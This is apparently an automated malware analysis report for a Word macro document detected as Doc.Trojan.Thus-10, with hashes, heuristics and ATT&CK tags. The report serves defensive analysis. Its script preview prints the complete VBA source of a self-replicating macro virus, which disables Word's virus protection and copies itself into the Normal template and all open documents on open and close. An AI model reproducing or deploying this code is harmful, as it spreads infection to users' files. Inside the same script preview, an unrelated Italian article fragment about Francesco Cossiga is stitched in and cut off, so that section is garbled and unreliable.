Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 61e62d388d310177…

MALICIOUS

Office (OLE)

80.5 KB Created: 2004-02-04 15:25:00 Authoring application: Microsoft Word 8.0 First seen: 2019-03-18
MD5: aa1ab08700c6878eaa5a4a9fa97381ed SHA-1: 341c6323c4ca713f3421e2af22c58de3a7f6fc03 SHA-256: 61e62d388d310177c9ad7e88cfc4b3243cdc7d652051c5e496e77286de32f4b3
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains a high-severity 'Document_Open' macro and critical ClamAV detections indicating it is malicious. The VBA script attempts to infect the NormalTemplate and other open documents, a common technique for establishing persistence or distributing further malware. The macro's behavior suggests it is part of a downloader or dropper mechanism.

Heuristics 3

  • ClamAV: Doc.Trojan.Thus-10 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Thus-10
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17033 bytes
SHA-256: a18f7f39fc06b1abdb74803d944ae92d76d1a61c027d3a04c4b153e8854a9393
Detection
ClamAV: Doc.Trojan.Thus-10
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'Thus_001'
'Anti-Smyser'
' This virus is an alteration of a virus which was
    Set prevDocument = ActiveDocument
    Set nextDocument = NormalTemplate
    On Error Resume Next
    Application.Options.VirusProtection = False
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Anti-Smyser'" Then
        NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
        .DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _
        .CodeModule.CountOfLines
    End If
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
        NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
        .InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _
        .CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _
        .Item(1).CodeModule.CountOfLines)
    End If
    If NormalTemplate.Saved = False Then NormalTemplate.Save
    
    For k = 1 To Application.Documents.Count
        If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Anti-Smyser'" Then
            Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
            .CodeModule.DeleteLines 1, Application.Documents.Item(k) _
            .VBProject.VBComponents.Item(1).CodeModule.CountOfLines
        End If
        If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
            Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
            .CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _
            .Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _
            .VBComponents.Item(1).CodeModule.CountOfLines)
        End If
    Next k
End Sub
Private Sub Document_Close()
    Document_Open
End Sub
Private Sub Document_New()
    
    
End Sub





































































corso della sua lunga degenza all’ospedale pubblico di Varese, capi di partito, grand  commis dello Stato e noti padroni delle ferriere, siano venuti a rendergli omaggio e, come sempre capita con Cossiga, a chiedere consiglio circa un affare politico (o un affare tout court).
“Ma dove ti ho già visto?”. Improbabile. E invece ha ragione la memoria di zio Francesco. E torna alla mente  Il Sabato, la casa del Presidente lì dietro l’angolo, una visita in redazione, un suo estremo tentativo di salvare la testata dalla chiusura. E comunque il senatore Cossiga ci è famigliare fin da quando era ministro degli Interni. Epoca di anni di piombo, terrorismo, sequestro Moro. Stagione grama anche per i ciellini, che dagli inizi alla fine degli anni ‘70 furono direttamente attaccati nelle scuole, nelle università, e pure nelle loro sedi, tant’è che un centinaio di volte vennero messe a soqquadro, in qualche caso finirono in fumo (e non per autocombustione). “Avete attraversato momenti così critici che ancora oggi non posso rivelare né in quali circostanze, né chi, dei vostri, ha corso molto seri pericoli”. Squillano i cellulari e Francesco Cossiga ha parole ben informate e pertinenti per tutti i casi. La telefonata più lunga è con Giuliano Amato, al quale il balente sardo dispensa consigli (uno
 è faceto: “convoca gli ambasciatori e annuncia che ordinerai il bombardamento della costa meridonale di Valona da parte della marina militare. Un lavoretto pulito, vedrai che prendi più voti”). Tra qualche giorno Cossiga salperà per un periplo settembrino della Corsica a bordo di un 50 metri di un amico non proprio proletario. Si gode la vita, il Presidente, con tutta la libertà e la letizia che gli si legge sul suo bel volto di vecchio in pace con la vita. Ma non fraintendete: Cossiga non ha alcun
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.